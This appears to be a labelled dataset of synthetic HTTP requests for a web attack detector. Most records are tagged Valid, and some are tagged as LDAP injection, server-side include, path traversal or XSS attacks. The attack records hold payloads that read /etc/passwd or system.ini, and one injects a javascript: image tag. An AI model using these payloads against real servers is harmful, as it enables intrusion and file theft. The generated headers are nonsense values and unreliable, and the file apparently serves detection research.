Transfer-Encoding: deflate
Upgrade: qanosa/4.6, asEeh/0.8, 67nibL/5.1, xnijf/5.3
Warning: 887 www.oialrTl.png:6 "2bmahswyehtth" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 149109156633944
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 23974
Start - Id: 11765
class: Valid
GET /k9O9Yyl7biwv4P/rD.FVoFn/sC6DcNlPM_GDqdgixGH/Ac/asbauar/Ld@V94U70Oue/3yrc/rnjos/uKt-/i--Xk8ApY5_bvwZbn/6wtpEeeta0vecPg/zV5-i-8ux3k_.css? HTTP/1.0
Host: www.tizydr3g.be:80
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: windows-874, x-mac-roman;q=0.1, iso-2022-jp;q=0.9, hz-gb-2312;q=0.9
Accept-Encoding: 
Accept-Language: w-hart, henlt9-u4cco
Cache-Control: no-transform
Client-ip: 104.75.164.98
Cookie: aclrgIlqwinw=9642333;trtsahcfh6sh=tecN|@oh4;kt=59415;s7zheshNqbN=688taaaiosO;rbsAo5coxsa=6057584;liainTehec1oh=tlatnOooh
Cookie2: $Version="57"
Date: Tue, 02 May 06 10:24:06 GMT
ETag: W/"XUahNjx80DQoNDggM"
Expect: 100-continue
From: KeaS@rpHi9.it
If-Modified-Since: Fri, 26 Nov 04 15:29:58 UTC
If-Unmodified-Since: Thu, 24 Aug 06 18:41:13 UTC
If-Match: "zmYwC0nm4mtTEyJC"
If-None-Match: *
If-Range: Wed, 03 May 06 09:23:40 CET
Max-Forwards: 0172
MIME-Version: 8.1
Pragma: axoe=id8
Proxy-Authorization: NTLM ZGRMazhodGRqb2Fka2FBcnJzMGFyYW5yc2hIbjVkZXR1aXB2Y3ZlcXQ=
Authorization: bnyse botTA=caewj
Range: 826738-,52-
Referer: /nlpsitt/0hw4uthl/sdak.ace
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.5 (compatible; raiwe; Linux i586; apunssme)
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 883x0271
Via: siicl/0.0 www.caebOynu.jpeg, 7.4 153.124.177.143
Transfer-Encoding: gzip
Upgrade: CeaT/1.3, qaai/6.4, iJd4/5.3
Warning: 624 49.80.148.81 "llhauia36uH" 
X-Forwarded-For: 125.237.64.6
X-Serial-Number: 68893779
----: -----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 11765
Start - Id: 29866
class: Valid
GET /5Tdthns8tiuE/gYP4incxJHTlH-1nw/kt1T/atsdi4e.gif?ietNns7sqce=odQO7VAiEPB&usepwebro=7603923&etdasmi=toci HTTP/1.1
Host: 71.216.72.193
Connection: btmrr
Accept: text/xml, application/postscript;q=0.3, text/*
Accept-Charset: ks_c_5601-1987, iso-8859-8;q=0.0, x-mac-chinesesimp
Accept-Encoding: deflate;q=0.7, gzip, deflate
Accept-Language: gil-1egvfe;q=0.4, a7hsr-wjahs0r4, Ime9eorh-kritfcay
Cache-Control: no-cache
Client-ip: 192.8.187.37
Cookie: e6cTierdaia=gostTow=sd3z;xte=soweS;piunespxd=9;s0undPholnne=n13uC
Cookie2: $Version="615"
Date: Wed, 05 Jul 06 18:16:05 UTC
ETag: "UvdqlEWJgso3WO0@EbD8"
Expect: ermu
From: hggtsom6@ieylr.uk
If-Modified-Since: Sat, 30 Oct 04 11:14:47 UTC
If-Unmodified-Since: Fri, 14 Sep 07 18:28:44 UTC
If-Match: *
If-None-Match: "GjkUPWhH.jAqOGL"
If-Range: Sun, 07 Oct 07 07:57:59 GMT
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest response="45DcFe932F9403C0A2bd6e0bCfDd5a07"
Authorization: gaai rseiin=eolnwUus
Range: 955167-75,390-,1-
Referer: http://www.enhth5o.uk/CnfO.msf
TE: gzip;q=0.8,trailers,trailers
Trailer: Via
User-Agent: ledreLe/4.2.3.9
UA-CPU: StrongARM
UA-Disp: 724,467,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 952x914
Via: 2.9 19.111.183.191
Transfer-Encoding: gzip
Upgrade: an1xa/7.5, saltfi/7.3, Yri8/0.3, y6siea/3.9, snse/6.7
Warning: 570 101.76.63.64 "qhHehxa5pope" 
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 82258082988548
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29866
Start - Id: 13382
class: Valid
GET /3QoaNezc/o6ilt/U-t-kc/iI/ryMw0m/yPpassthru9imgavtelnetS/6dbxGi_UTjKJ9B/eCoocauT/mas/lcOtea1e/JWOj2ewSlink8OX4F.jsp?msiituplsocrs3=79651&4passwdm6update31H0Pobject=g.titY1FtS&3hieraw=inputmn%25de92i8nCtawvee HTTP/1.1
Host: www.nOcw6Lhlp.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=37
Client-ip: 88.65.120.166
Cookie: 0TkJJT-enY1s=2457185;htoenrgcs1Sv=642647961
Cookie2: $Version="49"
Date: Sun, 21 Nov 04 12:04:12 CET
ETag: W/"YHWB-pSd1IKDDMSDMhX"
Expect: nsnth
From: tR8tllhl@cnlly.de
If-Modified-Since: Tue, 10 May 05 03:06:37 CET
If-Unmodified-Since: Sun, 02 May 10 06:56:56 GMT
If-Match: *
If-None-Match: "ycqV6hXmDm38qj1"
If-Range: Thu, 02 Apr 09 07:02:54 GMT
Max-Forwards: 035
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cost eNin=l2ee4li
Authorization: Basic ZWVzbnZsZG46bmlsZA==
Range: 30-,-79267,97-361160
Referer: /9eaf5n/OYiR/useufpru/abxoax/rfmuEyn.txt
TE: chunked,gzip;q=0.2
Trailer: Warning
User-Agent: Mozilla/9.9 (compatible; MSIE 6.0; Win98; aov1ny; wmobia7ci; seeaabm5t)
UA-CPU: x86
UA-Disp: 6806,3540,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 968x9217
Via: eAku/9.2 113.202.177.2:18, 2.9 www.L0nWewe.css, FTP/8.3 www.aPHOma.jpeg
Transfer-Encoding: fnlea
Upgrade: tNatdt/7.8, 7ear/6.7, nTyilu/3.1, oyem/6.0
Warning: 179 www.bavgex.js "ahhenfcehln" 
X-Forwarded-For: 245.210.86.17
X-Serial-Number: 0029155789665263
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13382
Start - Id: 33299
class: Valid
PUT /itEenP6era/-1cVRzN@/ozjua_mGJPTY18nRCn/sarnAeoYec6uTptu5o/7uebgivrotjiAfteo/iuhatsblX/bZJQ3AfJYQkkr0K/emiizeFhw1rnytdyoc/metandMZd.WF4n/Q3/vnmiyweemo5adaccra.htm? HTTP/1.1
Content-Length: 47
Content-Language: ae2e
Content-Encoding: deflate
Content-Location: /wmkrol/xmfwi.jpg
Content-MD5: dGF0eW45ZWFwa2ZiYWh3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Oct 04 21:57:46 GMT
Last-Modified: Wed, 08 Aug 07 02:29:58 GMT
Host: www.issYlnDbnl.ch:84
Connection: close
Accept: video/*, application/*, audio/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: il-ht23e, b-revd
Cache-Control: no-cache
Client-ip: 40.3.59.205
Cookie: hsepd=hIEjtV;e69Jom6= 
Cookie2: $Version="012"
Date: Thu, 04 Sep 08 01:57:02 GMT
ETag: "Xe2rEz2vPptDIu.1ip"
Expect: mkhuhn=8bheVe8;ujr7eg
From: fotmtnu@a26intx.net
If-Modified-Since: Fri, 24 Oct 08 16:44:17 GMT
If-Unmodified-Since: Thu, 24 Aug 06 10:28:48 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Aug 04 13:03:52 GMT
Max-Forwards: 057
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWwycGM4ZXRubm56ZXd0c05sbXl5bGVpbHNuaGxlamFlOHp0amxqZWRSYXhvbg==
Authorization: NTLM b3JldGVUbmlvTm1uZHdzM2F0b2lpcmhuc2J0Ykk2bGxlbnlhZWU2
Range: 8584-634
Referer: http://www.tTwnhgr.be/HRevelz.jsp
TE: trailers
Trailer: From
User-Agent: Mozilla/8.6 (compatible; Konqueror/4.0; Linux i586; 8ilv)
UA-CPU: MIPS
UA-Disp: 3676,3316,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8624x050
Via: 4.3 0.189.82.133:6
Transfer-Encoding: Lubo; irDi=gOut
Upgrade: h8A8/9.7, lbu/7.5, vytEEe/1.9, eAzrh/1.5
Warning: 536 www.i6hio.jpeg "noasnsnawtaemRses" 
X-Forwarded-For: 25.177.72.70
X-Serial-Number: 23873928020
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qrt8dtshwhrwjdd=;sge|"fn&u2QwmEOpR2@I=aor

End - Id: 33299
Start - Id: 37055
class: LdapInjection
GET /fHNH_WBFlKe_OjJ.cgi?mem=es4&woiateos=4&t9v=42981&nhtsut=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&hq=1200&keebadrok4=5thRInNstsInHykc&wrl2d7onDNoo=ioyn&tiezne2eiiltq=39547&aeee=3060 HTTP/1.0
Host: 36.37.22.153
Connection: keep-alive
Accept: audio/*, application/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 0et-g;q=0.4, zurtltmt-0Zftald;q=0.1, nt-hn;q=0.9, hnctrY-wurmcrc
Cache-Control: no-transform
Client-ip: 197.60.249.140
Cookie: mdecwnihey3cms=re~|E7tshn2
Cookie2: $Version="68"
Date: Wed, 12 Nov 08 20:39:55 CET
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 02 Oct 05 02:56:45 CET
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: "q@hzPsFAL1z1fYHKmt"
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 7405
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic Y2VNaWo6YWRuZVI=
Range: 03242-,-0
Referer: http://ao7ar.net/tx4link/eArtc6i.mdb
TE: gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 4.4; wt-dw; rv:9.1.2) Gecko/11575820
UA-CPU: 68000
UA-Disp: 907,610,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 716x540
Via: HTTP/6.2 www.OpSNh.js, HTTP/7.7 151.99.94.185:30
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37055
Start - Id: 24149
class: Valid
GET /fRRcm-CXA5I/FZ9a6EfODjOzUd/u-5SIFinclude1akt/OQBpassthru81z1WNhttpiE/nqpQ9Y/95dL.lBmKGXisLc/.Lntlog3objectG/iAKu6U@MFsAL9O.l4/dYaea7wsq/obH/CMF.jsp? HTTP/1.0
Host: 251.165.118.41
Connection: teoe
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ouerruj-or;q=0.1, hetar-snOAn, nlS-rO;q=0.0, t-es;q=0.2, t7p-qisooucy
Cache-Control: max-stale=15
Client-ip: 54.18.159.46
Cookie: injeetrknlepynE=l c\nestdinan;menhoievnooeg7=sohr;ta=ssbthineNusstoik;inxs=12;ehironbnaabhd=mblttineLiw;e91ht=etwniHzs6uBq
Cookie2: $Version="41"
Date: Mon, 19 Apr 04 18:08:09 GMT
ETag: W/"hyCLe-mJkmIiYaczk"
Expect: 100-continue
From: ehlfwDei@ioSehd.biz
If-Modified-Since: Sun, 15 Feb 04 07:10:53 UTC
If-Unmodified-Since: Tue, 05 May 09 18:43:38 CET
If-Match: *
If-None-Match: "BfljSDKUkenHPP5BrRZr"
If-Range: Fri, 24 Feb 06 20:07:40 GMT
Max-Forwards: 42
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM aG5oOGVMaGhQZWVoZWVlNlFlNWhkZzdlckQ5aW1sa29MYWRlMA==
Authorization: sagzi arhoteu=ahqsel
Range: 872-9,867-
Referer: http://www.Ssisht.com/risl/fyebkso/Eesezef.jsp
TE: chunked,trailers,chunked;q=0.0
Trailer: Host
User-Agent: jucs0/1.9.6.1.4
UA-CPU: MIPS
UA-Disp: 3355,078,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9598x0214
Via: 1.2 www.oean.shtml
Transfer-Encoding: identity
Upgrade: eiii/0.5, 9ndue/3.8, tBtdt/3.0
Warning: 419 149.233.136.188 "t2uaeagduwn" 
X-Forwarded-For: 177.238.208.255
X-Serial-Number: 14467935951
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24149
Start - Id: 39508
class: SSI
GET /lIuBmTa.sh? HTTP/1.1
Host: 39.134.194.141
Connection: oEOwe
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, x-mac-cyrillic;q=0.8, x-mac-korean, euc-tw;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 140.169.203.87
Cookie: soyhes7oYlsesr=qa;8@1Dase8=mk;5sgoTgr0kd5uccl=03lYoK;GPSb-I=rrn ;y7r2ah=nbssd+maLash$;aqptensk=nrd
Cookie2: $Version="666"
Date: Sun, 28 Mar 04 17:17:46 GMT
ETag: "Cs@6kzG1GqeSK6I_A29W"
Expect: 100-continue
From: noio8e@tcsueIh.com
If-Modified-Since: Mon, 30 Apr 07 13:25:19 GMT
If-Unmodified-Since: Sat, 12 Jul 08 18:57:23 CET
If-Match: "F-S1FdQT-MQaD4Q0t"
If-None-Match: *
If-Range: Mon, 07 Mar 05 17:38:55 GMT
Max-Forwards: 99
MIME-Version: 5.2
Pragma: aRCp='4Seti1Te'
Proxy-Authorization: aooaI5 nFQs=aht8teci
Authorization: Basic dEM2bTJvQTo2ZXNl
Referer: http://mwle4a.it/oepRql/iwr8a/dehbRg.jpg
TE: chunked;q=0.0
Trailer: Cache-Control
User-Agent: <!--  #include virtual="/etc/passwd"     -->
UA-CPU: MIPS
UA-Color: color8
UA-Pixels: 8306x0856
Via: HTTP/5.0 www.dtIca.png, HTTP/1.1 www.1bzact.jpeg
Transfer-Encoding: deflate
Upgrade: emim/2.6
Warning: 628 148.151.2.105 "y0cm" 
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39508
Start - Id: 45949
class: PathTransversal
GET /n5ZQOmgD7yVZKNOipQb/nfsGaeRxlndSrnc1htr4/drBRVA/dtT0an7niwlde/o.3wVzQtRYBu8.g/dN-J/TgTykZusrJ8/6hf-O2V_bl/nGsEBgorElW-MF/aidmetLtn/os.asp?see3OpwtuCup=ee46z&VCa1=staltaaim&tdq=859391&o5tasaoe68rc=To+n&X-lXhttpJ=59605&eodthteO=tx0tbJJHRY&echoe7mwLN=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: 146.186.65.201
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8, compress, identity, compress, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 81.34.102.44
Cookie: gbycitApalyj=92
Cookie2: $Version="028"
Date: Thu, 02 Nov 06 17:54:22 GMT
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: crtlt=umde;foerOz=oacmedeu
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Fri, 13 Feb 04 06:44:29 CET
If-Unmodified-Since: Wed, 05 Dec 07 17:16:41 CET
If-Match: "q2foPSNk1I8q8EYxL"
If-None-Match: "8IBIsprOc3jomCys"
If-Range: Fri, 04 Apr 08 01:52:26 GMT
Max-Forwards: 3
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: tepn rgoni=edeefi5R
Referer: http://www.bbrc.org/yusboIm/eniy.ace
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: i2Cd.Ma http://www.dqfryxc.ch
UA-CPU: PowerPC
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: 7.5 www.ngsae.css, 9.0 www.e7sto3m6.js
Transfer-Encoding: gzip
Upgrade: Eih/5.7, olse/5.3, eieecn/0.8
Warning: 240 244.77.211.173 "osnMh" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45949
Start - Id: 40686
class: SSI
GET /7wpr.php4?Tw=6&elaaactas=%3C%21--%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&hjlt=36225292&crtrd=6cseUtrrTvh&tttiei0mroepbet=5213530&ImeOzamcs=162 HTTP/1.0
Host: www.ewoe1wo3di.com
Connection: ratn
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate;q=0.1, identity, identity;q=0.3
Accept-Language: nwr-mssi;q=0.3, sl-la, ngorw-aeen1a, 1hb-DSn;q=0.2, i-7;q=0.6
Cache-Control: max-stale=4509
Cookie: toRhte=i3dhBDP.8hF;rTcqlfBxhqF=yicddn;w9cbgsoundgr==iref7oe;ec=2wn\;ee=b>Ioe/f
Date: Tue, 26 Jun 07 06:39:35 UTC
ETag: "GptlDo7NDuQtbKkqIsI"
Expect: 100-continue
If-Modified-Since: Thu, 17 Jun 04 19:34:27 GMT
If-Unmodified-Since: Wed, 09 Feb 05 13:42:50 GMT
If-Match: *
If-None-Match: "HY4LNrto3Ph5t0PV57o0"
Max-Forwards: 1
MIME-Version: 0.6
Pragma: no-cache
Referer: /wesiuOsH/tsuoSln7/3hE9rcd.css
TE: gzip
Trailer: Date
User-Agent: mriasca/7.3.1
UA-CPU: x86
UA-Disp: 662,039,16
Via: FTP/9.0 164.4.105.68:320, FTP/5.5 127.13.253.132:53
Transfer-Encoding: 6Neyv
Upgrade: jre/3.8, na6R91/0.3
X-Forwarded-For: 31.11.7.35
X-Serial-Number: 322812284
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40686
Start - Id: 9711
class: Valid
GET /exec0R@0s/n.BE-ZQlB-/oD/Y@dI75_metaBLdocument7and/xNDtI9he4ninwcdsbI8.html?iloJWiitt3jdrrR=6l&Sceuh=n&kaqn5spOiss=cc%40&steulee=o8sP-%4002P3Gg&4BgntUr=00756&utejnusaQlFtS5=inp&window.openAlsRVVN6G3T=9359394652&voietbst=1774&tpassthru7mymochauq=yae%5D HTTP/1.1
Host: www.itezqEupoa.st
Connection: Emta8eaQ
Accept: image/gif
Accept-Charset: iso-2022-kr, x-mac-roman;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=06
Client-ip: 87.118.156.255
Cookie: eertclmrinws=j
Cookie2: $Version="968"
Date: Tue, 22 Mar 05 21:17:33 GMT
ETag: W/"DJNzeDYWi.q7Ci0JSt"
Expect: 100-continue
From: 6shioi@dci7b.st
If-Modified-Since: Thu, 07 Dec 06 02:04:12 GMT
If-Unmodified-Since: Tue, 02 Oct 07 12:16:34 CET
If-Match: "6PSnf4BjMSOYrH1B6g"
If-None-Match: *
If-Range: "skdWKd2Z3L2jHxjoz"
Max-Forwards: 2
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic Nk5ZdGV5QU46b2xHczBmcg==
Authorization: ai9e ihej=NI9Ht
Range: 4-,80-5936,42270-
Referer: /aio2oeit/aptkalx/zeahim6/oasea/bpol.tar
TE: deflate;q=0.9
Trailer: If-None-Match
User-Agent: whtnaietSr6eRdsc
UA-CPU: x86
UA-Disp: 985,159,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 141x4409
Via: HTTP/4.8 144.252.180.85:41042, 0.0 www.epgc.gif
Transfer-Encoding: deflate
Upgrade: e3d/8.2
Warning: 433 www.ehhrp.gif:2957 "rSrtoo9noa" "Mon, 31 Oct 05 18:45:44 CET"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9711
Start - Id: 25390
class: Valid
GET /wyb/hyYx4yCjvec6/tL5/nu6TxNneamass2e0sQ/zsmda4d4eonttk/QYI9@/NnSy.J@Z/eq/SlikeXOmailMqBwinntrW/htpassbPs-bX6s/mversuond/ocHoqrpsa9R00P.swf?uc9xhsea=889970412&ylsenwaj=tawqhiCseehd+uu&@5x.=r1bEiagow&aYcatGbinpc=514975&3oaSa=aLV0mW19R&eu=sowrtquswe0nyMs&ffotsueh=nm&2ciLahE=EYe9cEbptxcra&x1gimgf@_wa8R7=qhH68x&6ngetlekSr1t=6324208&lvoowwTffg=ojUdguP.v&ub1tak6bnvl=7915808&enoe0oouohsngp=lu%3CTu4 HTTP/1.1
Host: www.atcq12a.it
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.5, x-mac-japanese;q=0.9, windows-1258, windows-1251;q=0.1
Accept-Encoding: compress, compress
Accept-Language: lmhPcim-hdtdi;q=0.8, au-iio4Lma, ea5-hii;q=0.3, 9oEOei-mc, i-spe5d;q=0.0
Cache-Control: Ocyin1='nb'
Client-ip: 45.139.165.17
Cookie: osOhortejgns=7668675;rzaiheoot1i=ndMtdtinrhzb~window.opendba
Cookie2: $Version="522"
Date: Fri, 04 Sep 09 15:16:35 GMT
ETag: W/"cAK805fzQkE8EYs0Vg1w"
Expect: 100-continue
From: drrovE@debi2e.fr
If-Modified-Since: Tue, 13 Apr 04 13:05:29 GMT
If-Unmodified-Since: Wed, 13 May 09 22:04:41 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Mar 04 19:27:29 UTC
Max-Forwards: 1532
MIME-Version: 2.0
Pragma: 94aO=tec4t
Proxy-Authorization: NTLM Yk9lb3N0ZWRvbXVtYXNpbXQzZXRzZHh3Y2hjV2F3dG02aW8=
Authorization: NTLM dHlvYXJoYnNpZWFOY3ZyYWUybGk0ZWZxVG9sYXpveXUzc2Zh
Range: 7820-,350834-024
Referer: http://hnuodt.org/7etioelh/n9er/r9rsuou/16ngdin.dll
TE: deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: voinnOhW (o6.wTl3; cLP6JWEd; qG6NHgy)
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: deflate
Upgrade: aer/3.2, cuxRP7/3.1, tvea/5.6, A3e/4.9
Warning: 361 189.181.68.53 "fIjyiokT66aez" "Tue, 06 Apr 10 13:42:10 UTC"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 927015568705209514
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25390
Start - Id: 26942
class: Valid
GET /ntnQmwS/2isOnejhutZutaew9qsa/eteexfCb/i3orElihycuHr/ihmeLgitAlenyah/sH/lunndft/rEy.ohFLZaarNK0mOX/UX.jpeg?cJmp=j&HEEvtnxecas=obdt&soalgcwsort=%3ClxjnfeeeexectTe+&seN4=1pcdszh&dm92dtlwal=dnp&oopIJoefiha=ltn&A0gsmaUuc=267700973&to1wHttre=8621&pc3tca5a=4 HTTP/1.1
Host: 190.186.62.161
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 117.203.102.112
Cookie: 6ndneoognha6=9fs7etnx;es7i2noxhlE=sh3;jI-2=80
Cookie2: $Version="14"
Date: Wed, 30 Mar 05 09:01:26 GMT
ETag: W/"lPUNtoa6_Lf.y.x3a4i6"
Expect: 100-continue
From: axiss@aot2E0o.net
If-Modified-Since: Tue, 27 Dec 05 18:05:34 GMT
If-Unmodified-Since: Thu, 23 Feb 06 02:03:48 GMT
If-Match: *
If-None-Match: "QOVoYoSN4M.V1h_YEJI"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Lsqh neinrtc=qqEEf
Authorization: NTLM OXBocnJvTnluYWNtdm5PQWlyNmVnZTFlZXI4Y2FoaGVuaXNFRQ==
Range: 909287-,-7
Referer: http://EOonagst.ch/aD0kla.dll
TE: gzip
Trailer: Range
User-Agent: tntii/4.6
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 863x0796
Via: FTP/0.7 www.d1EtOt.jpeg, 1.1 www.en9l.gif, HTTP/7.3 www.eesm9e.tiff
Transfer-Encoding: utls; veyal=tr9bP
Upgrade: 4dtel/9.0, ditos1/6.4, ruIehu/9.5, reatd/7.5
Warning: 561 www.wyno.js "aaajeaa" "Mon, 25 May 09 20:49:12 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26942
Start - Id: 46804
class: XSS
PUT /lsas74ia10ahtepxsyAA/Je/aWhu8lnLldDlek3x/oPy/dimvdYLQR/4jtpedd/orntldeo/rf/aT/yfFwUEn/1lju/omenh8yeropAzlh.png? HTTP/1.1
Content-Length: 264
Content-Language: ashemera,4ar
Content-Encoding: deflate
Content-Location: http://eaoda.com/kenEa/suoet/nwrtId.gz
Content-MD5: b2V5ZGFldW9oN2h0bmxuNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 03:06:46 UTC
Last-Modified: Mon, 07 Jan 08 21:38:21 UTC
Host: www.a57l3N1i.cz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 163.182.220.152
Cookie: samopenls6Kbinzi=vHueqLhT;Raetkice=e-7fGi;it6e=n1s4ubll
Cookie2: $Version="3"
Date: Thu, 06 Oct 05 08:56:23 CET
ETag: "zdWaUN_28hOSe2q66Mv"
Expect: 100-continue
From: he2rmeQu@ialstesjs.st
If-Modified-Since: Sun, 25 Dec 05 08:20:21 UTC
If-Unmodified-Since: Wed, 01 Feb 06 19:54:53 UTC
If-Match: "yCAS1H9xhaTvrLyDOYnr"
If-None-Match: *
If-Range: "C7jn6ZyF0CXX1p4r"
Max-Forwards: 8
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: oand kioW=rs9ay
Authorization: pHir errlaW5a=wzth
Range: 15-86
Referer: http://8eert9.biz/iasbv/t5ttqI.swf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: eoiitt/2.6.1
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: 2.5 64.74.41.231, FTP/3.7 www.erecoa.htm, coli/5.6 185.118.118.60
Transfer-Encoding: nhPr; u3bs2aRe=daOe
Upgrade: 5dpmt/2.8, kAt/9.2, PrmjAp/1.4, moi/3.4
Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aiovwoxds=eerdaaaoeety&iwapgheagt5ace=iNa3h&Ceftlocp=&manor&acpiss=639&etafr9oetioe=aiOigE4pcda&u3aby=wp2otoetntetsn7&acn8i=289&oGyaHhs0Tsl=41895&fEadegadcohaW=<img     src=   "   javascript:   [alert ('sTad');]  " >&nmarxtswwttaete=cXh

End - Id: 46804
Start - Id: 7235
class: Valid
POST /xohrirnehu/sLfeeuauebrneo3ea/aanhRlrt/sndaP-u0L/s0R-vMS/cp/ghfeortoeranR5/nxJRZAcCLKwF/1rMMUhXkg8NtE.jsp? HTTP/1.0
Content-Length: 23
Content-Language: dexre3hl,Rr
Content-Encoding: compress
Content-Location: /hQeos6.mp3
Content-MD5: bmNsZXRhN3UxYW5iYWVvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Feb 09 21:10:10 UTC
Last-Modified: Thu, 10 Dec 09 10:03:48 GMT
Host: 165.195.21.249
Connection: sxs3
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: smtdhg-dte;q=0.8, x8-rntaibR;q=0.0
Cache-Control: only-if-cached
Client-ip: 141.243.0.200
Cookie: D9fTh9b7Nl6=576;mdtgdrteheo=7592784;c0qjeoTacceptZB=57
Cookie2: $Version="133"
Date: Sat, 26 Jun 04 05:34:20 GMT
ETag: W/"xW9iQg4ai.AItWqe1SA-"
Expect: rri96osu
From: tEeitzcO@nnr4hrhhd.fr
If-Modified-Since: Mon, 29 Jun 09 13:11:00 UTC
If-Unmodified-Since: Mon, 27 Aug 07 06:48:01 GMT
If-Match: "FKxwsBjv5wDvyfqVp4h"
If-None-Match: "J2rRnnm82uMYyQ@rHTL"
